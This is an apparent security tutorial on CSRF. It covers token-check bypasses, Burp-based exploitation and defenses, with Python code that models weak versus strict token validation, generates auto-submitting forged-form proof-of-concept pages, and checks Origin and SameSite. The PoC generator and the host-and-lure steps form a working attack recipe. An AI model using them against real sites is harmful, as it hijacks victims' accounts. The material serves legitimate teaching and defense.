Shulou (Shulou.com), SLTechnology News & Howtos > Development. 06/01 report, updated 2025-02-27.
This article explains how cross-site request forgery (CSRF) works, how it differs from XSS, how commonly deployed CSRF-token checks are bypassed in practice, and which defenses actually hold up.
CSRF
Most websites today defend against CSRF with a CSRF token: a random value that the server issues and that must be sent back in a field of every state-changing request. When the token is implemented correctly, a plain CSRF attack fails, because the attacker cannot know the victim's token. Exploitation then needs a second flaw. The classic combination is XSS on the target origin: script running there can fetch a page that contains the token, read it, and include it in the forged request, which defeats the token check (although an attacker with XSS on that origin can already act as the user directly, so the token is not what is protecting the user at that point). The more common situation is a token check that is implemented incorrectly and can be bypassed without any XSS; the bypasses are covered below.
The difference between CSRF and XSS: XSS runs attacker-controlled script inside the victim's browser on the target site. That script can read the user's cookies and other data and use them to act as the user, or simply issue requests itself.
CSRF involves no script on the target site at all. The attacker prepares a request and tricks the user's browser into sending it; the browser attaches the user's session cookie automatically, so the server sees a request that, as far as it can tell, the user made.
Vulnerability principle
Cross-site request forgery: the attacker crafts a request to the target site (usually delivered as a malicious link or a page the attacker controls) and gets the user to open it while logged in to the target. The browser sends the request with the user's session cookie, the server performs the action as that user, and the attack succeeds. The server cannot distinguish the forged request from a genuine one unless it checks something that a third-party page cannot supply.
Vulnerability impact
1. Changing user data: modifying the registered e-mail address, changing the password, transferring money, and so on.
If the change is submitted with GET, the forged request is just a URL: send it to the user as a link, or load it silently from an attacker page with an <img> tag. If the user opens it while logged in, the field is set to the value in the URL.
If the change is submitted with POST, the attacker hosts a page on a public server containing a hidden form that targets the vulnerable endpoint and submits itself automatically, then sends the user a link to that page. When the user visits it while logged in to the vulnerable site, the browser posts the form with the user's cookie and the data is changed.
Bypassing the defenses
1. Switch the request method to bypass CSRF token verification:
Some applications validate the CSRF token only on POST requests, while the same handler also accepts its parameters via GET. Changing the request method to GET then skips the check entirely.
In Burp, intercept the request and use "Change request method" to convert it to GET, then confirm that the server still performs the action.
Then use the CSRF PoC generator to build a proof of concept that carries the GET request (or, for a form, an auto-submitting script).
2. Only the presence of a token is verified:
Delete the CSRF token parameter entirely and see whether the request is still accepted. Some applications validate the token when it is present but skip validation when the parameter is missing, so an attacker simply omits it from the forged request.
3. The token is not bound to the user's session:
The application keeps a global pool of issued tokens and accepts any request whose token exists in the pool, without checking that the token was issued to the session making the request. An attacker logs in with their own account, obtains a valid token, places it in the forged request, and delivers it to the victim. The victim's browser sends it with the victim's session cookie, the token is found in the pool, and the request is accepted.
4. The token is bound to a cookie other than the session cookie:
The token is tied to a cookie, but not to the cookie that identifies the session. This typically happens when two frameworks are used side by side, one handling sessions and the other CSRF protection, without being integrated. If the attacker can set that second cookie in the victim's browser (for example through a cookie-injection flaw, or from a subdomain they control), they can plant a cookie/token pair of their own, and the forged request passes the check while still executing in the victim's session.
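The four bypasses above, as an added example that is not code from the article: a stripped-down model of server-side token validation. `WeakTokenCheck` reproduces the bypassable patterns (POST-only check, missing token skipped, a global token pool not tied to the session); `StrictTokenCheck` derives the token from the session cookie so there is no pool and no second cookie to plant. `Request` is a stand-in for a framework's request object, and every name, session id and parameter here is made up.

```python
# Added example, not code from the article. Models weak vs. hardened CSRF token
# validation; Request stands in for a web framework's request object.
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    form: dict = field(default_factory=dict)      # body parameters
    cookies: dict = field(default_factory=dict)   # "session" is the session cookie (made-up name)


class WeakTokenCheck:
    """Validation with the bypasses from the text built in."""

    def __init__(self):
        self.issued = set()                       # one global pool shared by all users

    def issue(self, session_id: str) -> str:
        token = secrets.token_hex(16)             # random, but not tied to session_id
        self.issued.add(token)
        return token

    def verify(self, request: Request) -> bool:
        if request.method != "POST":
            return True                           # bypass 1: switch POST to GET
        token = request.form.get("csrf")
        if token is None:
            return True                           # bypass 2: remove the parameter
        return token in self.issued               # bypass 3: attacker's own token is in the pool


class StrictTokenCheck:
    """Token = HMAC(secret, session id): valid only for the session whose cookie
    it was derived from, so there is no pool and no separate cookie to plant
    (bypass 4). Missing tokens are rejected, the comparison is constant time,
    and a state-changing endpoint only accepts the methods it is built for."""

    def __init__(self, secret=None):
        self.secret = secret or secrets.token_bytes(32)

    def issue(self, session_id: str) -> str:
        return hmac.new(self.secret, session_id.encode(), "sha256").hexdigest()

    def verify(self, request: Request, allowed_methods=("POST",)) -> bool:
        if request.method not in allowed_methods:
            return False                          # a GET to a state-changing endpoint is rejected, not waved through
        session_id = request.cookies.get("session")
        token = request.form.get("csrf")
        if not session_id or not token:
            return False
        return hmac.compare_digest(self.issue(session_id).encode(), token.encode())


def run_bypasses(check, victim_session: str, attacker_session: str) -> dict:
    """Replay the attacks from the text against `check`; True means accepted."""
    victim = {"session": victim_session}
    attacker_token = check.issue(attacker_session)   # attacker logs in to their own account
    change = {"email": "attacker@evil.example"}      # made-up payload
    return {
        "method_switch": check.verify(Request("GET", change, victim)),
        "token_removed": check.verify(Request("POST", change, victim)),
        "attacker_token": check.verify(Request("POST", {**change, "csrf": attacker_token}, victim)),
        "legitimate": check.verify(Request("POST", {**change, "csrf": check.issue(victim_session)}, victim)),
    }


if __name__ == "__main__":
    print("weak  :", run_bypasses(WeakTokenCheck(), "victim-sid", "attacker-sid"))
    print("strict:", run_bypasses(StrictTokenCheck(), "victim-sid", "attacker-sid"))
```

Against the weak checker all three forged requests come back accepted; against the strict one only the legitimate request does. The HMAC-of-session-id design is one of several valid ways to bind a token to a session (storing a random token in the server-side session works just as well); the point is that validity is decided per session, never by membership in a shared pool.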
Exploitation
Use Burp's CSRF PoC generator to build the proof of concept, copy it to your own VPS, and get the user to visit it while logged in; when they do, the forged request is sent and the attack is complete.
Because the change should be submitted without any user interaction, tick "Include auto-submit script" in Burp before regenerating, so the PoC submits its form as soon as the page loads.
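The GET and POST proofs of concept described in the impact section and generated here, as an added example that is neither the article's code nor Burp's: a small generator that produces the same kind of auto-submitting form page. The target URL and parameter names are made up.

```python
# Added example, not code from the article and not Burp's generator. Builds a
# GET-style CSRF URL and a POST-style auto-submitting form page.
import html
from urllib.parse import urlencode, urlsplit, urlunsplit


def build_get_poc(url: str, params: dict) -> str:
    """GET case: the forged request is just a URL. Send it as a link, or load it
    silently from an attacker page with <img src="...">."""
    scheme, netloc, path, _query, fragment = urlsplit(url)
    return urlunsplit((scheme, netloc, path, urlencode(params), fragment))


def build_post_poc(url: str, params: dict, auto_submit: bool = True) -> str:
    """POST case: a hidden form pointing at the target. With auto_submit a script
    submits it as soon as the page loads (Burp's "include auto-submit script"
    option); without it the victim has to click the button. Names and values are
    HTML-escaped so a quote in the payload cannot break the form markup."""

    def esc(s) -> str:
        return html.escape(str(s), quote=True)

    fields = "".join(
        f'    <input type="hidden" name="{esc(name)}" value="{esc(value)}" />\n'
        for name, value in params.items()
    )
    button = "" if auto_submit else '    <input type="submit" value="Submit request" />\n'
    script = "  <script>document.forms[0].submit();</script>\n" if auto_submit else ""
    return (
        "<html>\n<body>\n"
        f'  <form action="{esc(url)}" method="POST">\n'
        f"{fields}{button}"
        "  </form>\n"
        f"{script}"
        "</body>\n</html>\n"
    )


if __name__ == "__main__":
    target = "https://vulnerable.example/account/email"     # made-up target endpoint
    print(build_get_poc(target, {"email": "attacker@evil.example"}))
    # No csrf parameter at all: this is the "token removed" variant from the bypass section.
    print(build_post_poc(target, {"email": "attacker@evil.example"}))
```

Host the returned HTML on a server you control and send the victim its URL; the form posts to the target with whatever cookies the victim's browser holds for that site (subject to the SameSite rules discussed under defenses).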
Defensive measures
1. Token validation:
Include a randomly generated, unpredictable token as a parameter in every state-changing request, bind it to the user's session, validate it on the server, and reject the request if the token is missing, does not match, or was issued to a different session. Apply the check to every method that changes state, not only to POST, and make sure no GET handler changes state at all.
2. Checking the Referer header:
The Referer header records the URL of the page that issued the request; if it does not belong to the site's own origin, the request is rejected. This is weaker than a token and easy to get wrong. A cross-site page cannot set the victim browser's Referer header to an arbitrary value, but it can suppress the header (for example with a <meta name="referrer" content="no-referrer"> tag), and many implementations accept a request that has no Referer at all, which is then a complete bypass.
Implementations that only look for the expected domain as a substring are bypassed as well, with URLs such as https://target.example.attacker.example/ or https://attacker.example/?target.example. Compare the full origin (scheme, host and port), reject requests where the header is absent, and prefer the Origin header, which browsers send on cross-origin POST requests and which a page cannot forge.
3. Re-authentication for sensitive operations:
Require the current password, a second factor, or a CAPTCHA before changing or resetting the password, changing the e-mail address, making a transfer, and similar actions. A forged request cannot supply any of these.
4. SameSite cookies
The SameSite cookie attribute controls whether the browser includes the cookie in cross-site requests. It is normally used together with CSRF tokens, not instead of them.
With SameSite=Strict the browser never sends the cookie on a request that originates from another site. This is the strongest setting but affects usability: a user who follows a link to the site from elsewhere arrives without their session cookie, appears logged out, and has to log in again before the site works normally.
With SameSite=Lax the browser sends the cookie on a cross-site request only when both conditions hold: the request is a top-level navigation (the user clicking a link, for instance) and it uses a safe method (GET or HEAD). A cross-site POST, or a GET issued by a script, <img> or <iframe>, is sent without the cookie. Chromium-based browsers treat cookies that carry no SameSite attribute as Lax by default, but with an exception that still sends such cookies on top-level cross-site POSTs for the first two minutes after they were set, so set the attribute explicitly rather than relying on the default. Note also that SameSite is about sites, not origins: a vulnerable subdomain under the same registrable domain is same-site and can still make requests that carry the cookie. SameSite=None disables the protection and is only accepted together with Secure.
Set-Cookie: SessionId=sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN; SameSite=Strict
Set-Cookie: SessionId=sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN; SameSite=Lax
5. CSRF tokens in practice
The server generates the token when the session is created (or per form), embeds it in the page, and requires every subsequent state-changing request to carry it. A request whose token is missing, does not match, or belongs to another session is rejected. Tokens do not replace measures 2 to 4; a token plus a SameSite session cookie is the usual combination.
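The Referer/Origin check from measure 2 and the SameSite behaviour from measure 4, as one added example that is not code from the article: a source check that rejects missing headers and substring matches, a Set-Cookie builder in the form shown above, and a small model of the browser's decision whether a Strict, Lax or None cookie is attached to a request. The site origin and cookie value are made up; the rules in `cookie_sent` follow the SameSite specification, and treating a cookie with no attribute as Lax is Chromium's default, stated as an assumption in the code.

```python
# Added example, not code from the article. Origin/Referer source check plus a
# model of SameSite cookie behaviour. Hostnames and cookie values are made up.
from urllib.parse import urlsplit

SITE_ORIGIN = "https://vulnerable.example"   # made-up site origin


def source_allowed(headers: dict, site_origin: str = SITE_ORIGIN) -> bool:
    """True only if Origin (preferred) or Referer names our own origin exactly.
    A missing or 'null' header is rejected, because a cross-site page can
    suppress Referer with <meta name="referrer" content="no-referrer">.
    The comparison is on scheme://host[:port], never a substring match, so
    https://vulnerable.example.attacker.example and
    https://attacker.example/?vulnerable.example both fail."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return False
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return False
    return f"{parts.scheme}://{parts.netloc}".lower() == site_origin.lower()


def set_cookie(name: str, value: str, same_site: str = "Lax") -> str:
    """Session cookie header. Secure and HttpOnly are always set; SameSite=None
    is only honoured by browsers when Secure is present."""
    if same_site not in ("Strict", "Lax", "None"):
        raise ValueError("SameSite must be Strict, Lax or None")
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite={same_site}"


def same_site_attribute(set_cookie_header: str) -> str:
    """Read the SameSite attribute back from a Set-Cookie header. A cookie
    without one is treated as Lax here (assumption: Chromium's default)."""
    for attr in set_cookie_header.split(";")[1:]:
        key, _, val = attr.strip().partition("=")
        if key.lower() == "samesite":
            return val.strip().capitalize()
    return "Lax"


def cookie_sent(same_site: str, cross_site: bool, method: str, top_level_navigation: bool) -> bool:
    """Does the browser attach the cookie to this request?
    Strict: never on a cross-site request.
    Lax:    on a cross-site request only for a top-level navigation with a safe
            method (the user clicking a link); not for a cross-site POST, and
            not for GETs issued by <img>, <iframe>, fetch() or XMLHttpRequest.
    None:   always, cross-site or not."""
    if not cross_site:
        return True
    if same_site == "Strict":
        return False
    if same_site == "Lax":
        return top_level_navigation and method.upper() in ("GET", "HEAD")
    return True


if __name__ == "__main__":
    header = set_cookie("SessionId", "sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN", "Lax")
    print(header)
    mode = same_site_attribute(header)
    print("link click from another site, cookie sent:", cookie_sent(mode, True, "GET", True))
    print("auto-submitted cross-site POST, cookie sent:", cookie_sent(mode, True, "POST", True))
    print("Origin check on forged POST:", source_allowed({"Origin": "https://attacker.example"}))
```

Run against the auto-submitting POST form from the exploitation section, a Lax session cookie is simply not attached, so the server sees an unauthenticated request; the Origin check catches the same request independently, which is why the two are normally layered with a token rather than relied on alone.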